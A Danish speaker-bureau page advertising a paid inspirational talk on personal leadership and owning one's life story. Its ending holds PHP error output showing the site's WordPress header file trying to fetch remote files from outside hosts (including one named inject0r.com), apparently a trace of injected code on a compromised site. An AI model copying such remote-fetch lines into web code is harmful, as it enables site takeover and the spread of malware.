img-us
  • asc

    Foredragsholder Trine Kruse Lykkegaard

  • asc

    Emne Personligt lederskab

  • asc

    pris 8000.-

Jeg er kommunikationsrådgiver, journalist, forfatter og foredragsholder. Jeg rådgiver både privatpersoner og ledere i erhvervslivet i kommunikation baseret på indhold kontra udtryk.

Desuden afholder jeg kurser i taoistisk funderet mindfulness og meditation. At integrere krop og sind i dén proces ligger mig meget på sinde.

Udbytte:
- Skab det liv, du ønsker
- Nå dine mål
- Fortæl din egen historie
- Tag ejerskab
- Indtag førerpositionen i det liv, der er dit

SKAB DIN EGEN HISTORIE - OG BLIV FRI: ‘Story of my life’!
Har du også brugt dén vending om dig selv?

Oplever du, at bestemte temaer i dit liv går igen?

At du gentager nogle mønstre og ikke får dem brudt?

Måske bliver du ved med at møde den samme type partner, der ikke er god for dig.

Måske flytter du dig ikke derhen jobmæssigt, hvor du gerne vil være.

Men hvem fortæller din historie? Gør du - eller lader du andre om det?

Hvis du ikke skaber din egen fortælling, gør andre det helt sikkert for dig.

Nogen - som din familie og dine venner - måske i den bedste mening.

Andre ud fra motiver, der tjener deres eget formål. Fordi du lige passer ind i den fortælling, de selv er ved at skabe. Du var lige dén brik, der manglede i puslespillet for at gøre det færdigt. Deres puslespil, vel at mærke. Men det bliver dem og ikke dig, der kommer til at fortælle din historie. Hvem definerer dit rum? Har du prøvet at formulere for dig selv, hvad dit rum skal indeholde, for at det er dit, og for at det imødekommer nogle essentielle behov hos lige netop dig og ikke naboen eller din søster?

Til dette inspirations-foredrag hjælper jeg dig med at afdække din historie, og med at fortælle lige præcis dén historie, DU gerne vil fortælle om dig selv.

Med andre ord: Det liv, du ønsker.

Vi går bag om de historier, andre har forsøgt at fortælle om dig gennem tiderne, og de historier, du - måske ubevidst - fortæller om dig selv, den dag i dag.

Jeg er professionel historiefortæller og mener, at vi skaber os selv gennem de historier, vi fortæller om os selv. Vi kan frigøre os selv gennem den historie, vi fortæller - men vi kan også begrænse os selv. Derfor er vi nødt til at eje vores egen historie.

Min erfaring er, at det kan være meget kraftfuldt og transformerende at genfortælle sin historie for at blive fri.

Min passion ligger overgangen mellem indhold og udtryk. Min erfaring er, at det er dér, vi skal tage fat, for at det virkelig rykker. Vi er nødt til at arbejde med det, der sker, når vi udtrykker os, hvis vi skal gøre os håb om at kunne genfortælle vores historie.


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Torben Rif

Heidi Asbjørn Freke

Jacob Klaris-Jensen

Hanne Skov Hansen


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22